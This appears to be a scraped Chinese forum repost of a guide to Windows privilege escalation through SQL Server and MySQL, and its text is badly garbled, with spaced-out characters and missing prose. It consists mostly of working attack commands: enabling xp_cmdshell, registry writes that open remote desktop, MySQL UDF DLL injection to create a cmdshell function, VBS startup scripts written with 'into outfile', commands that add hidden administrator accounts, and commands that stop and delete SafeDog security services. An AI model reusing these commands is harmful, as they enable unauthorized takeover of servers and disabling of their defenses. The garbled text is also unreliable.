[22014] 2021-05-27_Windows系统提权之数据库提权

文档创建者:s7ckTeam
浏览次数:6
最后更新:2025-01-18
2021-05-27_Windows系统提权之数据库提权 W i n d o w s L e m o n S e c   2 0 2 1 - 0 5 - 2 7 A c c e s s S Q L   s e r v e r M y S Q L S Q L   s e r v e r M y S Q L l i n u x m y s q l   r o o t W i n d o w s m y s q l   r o o t z k e y s r o o t S Q L   s e r v e r   S A > > > > 3 3 8 9 > > S A 1 . 2 . w e b . c o n f i g c o n f i g . a s p c o n n . a s p d b c o n f i g . a s p s a 使 s a s q l m a p   - - i s - d b a d b a S Q L   s e r v e r s a m y s q l   r o o t 2 . 1 x p _ c m d s h e l l m s s q l   2 0 0 0 m s s q l   2 0 0 5 s a s p _ c o n f i g u r e 1 . 使 s a 2 . c m d _ s h e l l E X E C   s p _ c o n f i g u r e   ' s h o w   a d v a n c e d   o p t i o n s ' ,   1 G O R E C O N F I G U R E G O E X E C   s p _ c o n f i g u r e   ' x p _ c m d s h e l l ' ,   1 G O R E C O N F I G U R E G O
3 . 4 . 3 3 8 9 使 3 3 8 9 5 . e x e c   m a s t e r . d b o . x p _ r e g w r i t e ' H K E Y _ L O C A L _ M A C H I N E ' , ' S Y S T E M C u r r e n t C o n t r o l S e t C o n t r o l T e r m i n a l   S e r v e r ' , ' f D e n y T S C o n n e c t i o n s ' , ' R E G _ D W O R D ' , 0 ; - - # c m d _ s h e l l E X E C   s p _ c o n f i g u r e   ' s h o w   a d v a n c e d   o p t i o n s ' ,   1 R E C O N F I G U R E E X E C   s p _ c o n f i g u r e   ' x p _ c m d s h e l l ' ,   0 R E C O N F I G U R E # E X E C   m a s t e r . d b o . x p _ c m d s h e l l   ' i p c o n f i g ' # 3 3 8 9 e x e c   m a s t e r . d b o . x p _ r e g w r i t e ' H K E Y _ L O C A L _ M A C H I N E ' , ' S Y S T E M C u r r e n t C o n t r o l S e t C o n t r o l T e r m i n a l   S e r v e r ' , ' f D e n y T S C o n n e c t i o n s ' , ' R E G _ D W O R D ' , 1 ; # x p _ c m d s h e l l x p l o g 7 0 . d l l e x e c   m a s t e r . s y s . s p _ a d d e x t e n d e d p r o c   ' x p _ c m d s h e l l ' ,   ' C : P r o g r a m   F i l e s M i c r o s o f t   S Q L   S e r v e r M S S Q L B i n n x p l o g 7 0 . d l l '
2 . 2 1 . 2 . c m d _ s h e l l 3 . 4 . 3 3 8 9 2 . 3   c m d _ s h e l l ( r e m o t e   d e s k t o p   u s e r s ) 1 . E X E C   s p _ c o n f i g u r e   ' s h o w   a d v a n c e d   o p t i o n s ' ,   1 ; R E C O N F I G U R E ; E X E C   s p _ c o n f i g u r e   ' x p _ c m d s h e l l ' ,   1 ; R E C O N F I G U R E ;   # s q l   s e r v e r   2 0 0 5 # C c a c l s   c : / e   / t   / g   e v e r y o n e : F
2 . 3 . M y S Q L # s y s t e m n e t   s t o p   " s a f e d o g   g u a r d   c e n t e r "   / y n e t   s t o p   " s a f e d o g   u p d a t e   c e n t e r "   / y n e t   s t o p   " s a f e d o g g u a r d c e n t e r "   / y # s y s t e m s c   s t o p   " S a f e D o g G u a r d C e n t e r " s c   c o n f i g   " S a f e D o g G u a r d C e n t e r "   s t a r t = d i s a b l e d s c   d e l e t e   " S a f e d o g g u a r d c e n t e r " s c   s t o p   " S a f e D o g u p d a t e C e n t e r " s c   c o n f i g   " S a f e D o g U p d a t e C e n t e r "   s t a r t = d i s a b l e d s c   d e l e t e   " S a f e d o g U p d a t e c e n t e r " s c   s t o p   " S a f e D o g C l o u d H e l e r " s c   c o n f i g   " S a f e D o g C l o u d H e l e r "   s t a r t = d i s a b l e d s c   d e l e t e   " S a f e D o g C l o u d H e l e r " # k i l l h t t p s : / / g i t h u b . c o m / k e y i x i a x i a n g / x i a x i a n g - k i l l e r
r o o t 1 . 1 ( : c o n n . p h p , c o n f i g . p h p , d b c o n f i g . p h p , c o n f i g . i n c . p h p , c o m m o n . i n c . p h p , i n c , c o n n , c o n f i g . s q l , c o m m o n , d a t a s q l , d a t a , i n c , c o n f i g , c o n n , d a t a b a s e , c o m m o n , i n c l u d e r o o t r o o t r o o t m y s q l r o o t 1 . 2 ( s e l e c t   @ @ b a s e d i r )   ( / m y s q l / d a t a / m y s q l / u s e r . m y d ) u s e r . m y d u s e r . f r m , u s e r . m y i m y s q l m y s q l m y s q l 1 . 3 m y s q l d   - - s k i p - g r a n t - t a b l e s #   m y s q l . e x e   - u r o o t         #   M y S Q L
使 b u r p r o o t h t t p s : / / w w w . j b 5 1 . n e t / a r t i c l e / 9 4 8 6 7 . h t m M y S Q L u s e r h o s t % M y S Q L G r a n t   a l l   p r i v i l e g e s   o n   * . *   t o   ' r o o t ' @ ' % '   i d e n t i f i e d   b y   ' p a s s w o r d '   w i t h   g r a n t   o p t i o n ;
U D F 3 . 1   U D F u d f ( U s e r d e f i n e d   f u n c t i o n ) r o o t u d f . d l l u d f . d l l c m d w i n d o w s U D F . D L L M y S Q L s e c u r e - f i l e - p r i v M y S Q L   N U L L   v a l u e   ( ) M y S Q L 5 . 0 / 5 . 6 m y . i n i : M y S Q L 5 . 7 m y . i n i N U L L : 3 . 2 .   p l u g i n M y S Q L   5 . 1   m y s q l / l i b / p l u g i n / 5 . 1   c : / w i n d o w s 5 . 1 p l u g i n N T F S w i n   2 0 0 0 :   C : W i n n t u d f . d l l         w i n   2 0 0 3 :   C : W i n d o w s u d f . d l l  
p l u g i n s e l e c t   @ @ p l u g i n _ d i r ; u d f u d f p l u g i n p l u g i n u d f ) u d f s h e l l 使 u d f # N T F S p l u g i n s e l e c t   ' x '   i n t o   d u m p f i l e   ' C : / P r o g r a m   F i l e s / M y S Q L / M y S Q L   S e r v e r   5 . 1 / l i b / p l u g i n : : I N D E X _ A L L O C A T I O N ' ; s e l e c t   l o a d _ f i l e ( ' d : w w w r o o o t n e t w o r k l i b _ m y s q l u d f _ s y s _ 6 4 . d l l ' )   i n t o   d u m p f i l e   " D : M y S Q L m y s q l - 5 . 7 . 2 1 - w i n x 6 4 m y s q l - 5 . 7 . 2 1 - w i n x 6 4 l i b p l u g i n u d f . d l l " ; # c r e a t e   f u n c t i o n   c m d s h e l l   r e t u r n s   s t r i n g   s o n a m e   ' u d f . d l l ' # s e l e c t   c m d s h e l l ( ' n e t   u s e r   t e s t   1 2 3 . c o m   / a d d ' ) ;     s e l e c t   c m d s h e l l ( ' n e t   l o c a l g r o u p   a d m i n i s t r a t o r s   t e s t   / a d d ' ) ;     d r o p   f u n c t i o n   c m d s h e l l ;   #  
m y s q l 5 . 1 4 . 1   t e s t 4 . 2   T E S T s e l e c t   s y s _ e v a l ( ' w h o a m i ' ) # w i n   0 8 C : P r o g r a m D a t a M i c r o s o f t W i n d o w s S t a r t   M e n u P r o g r a m s S t a r t u p w i n   0 3 C : D o c u m e n t s   a n d   S e t t i n g s A d m i n i s t r a t o r c r e a t e   d a t a b a s e   t e s t ; c r e a t e   t a b l e   a   ( c m d   t e x t ) ;
4 . 3   4 . 4   V B S 4 . 5 m s 1 2 - 0 2 0 4 . 6   t e s t 1 2 3 a d m i n i s t r a t o r s 使 m y s q l v b s # a c m d t e x t i n s e r t   i n t o   a   v a l u e s   ( " s e t   w s h s h e l l = c r e a t e o b j e c t   ( " " w s c r i p t . s h e l l " " ) " ) ; i n s e r t   i n t o   a   v a l u e s   ( " a = w s h s h e l l . r u n   ( " " c m d . e x e   / c   n e t   u s e r   t e s t 1 2 3   1 2 3 4 5 6   / a d d " " , 0 ) " ) ; i n s e r t   i n t o   a   v a l u e s   ( " b = w s h s h e l l . r u n   ( " " c m d . e x e   / c   n e t   l o c a l g r o u p   a d m i n i s t r a t o r s   t e s t 1 2 3   / a d d " " , 0 ) " ) ; #   c m d , " 0 " , V B S s e l e c t   *   f r o m   a ; s e l e c t   *   f r o m   a   i n t o   o u t f i l e   " C : / / P r o g r a m D a t a / / A d m i n i s t r a t o r / / W i n d o w s / / S t a r t   M e n u / / P r o g r a m s / / S t a r t u p / / a . v b s " ; i n s e r t   i n t o   a   v a l u e s   ( " s e t   w s h s h e l l = c r e a t e o b j e c t   ( " " w s c r i p t . s h e l l " " ) " ) ; i n s e r t   i n t o   a   v a l u e s   ( " b = w s h s h e l l . r u n   ( " " c m d . e x e   / c   n e t   l o c a l g r o u p   a d m i n i s t r a t o r s   t e s t 1 2 3   / a d d " " , 0 ) " ) ;
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则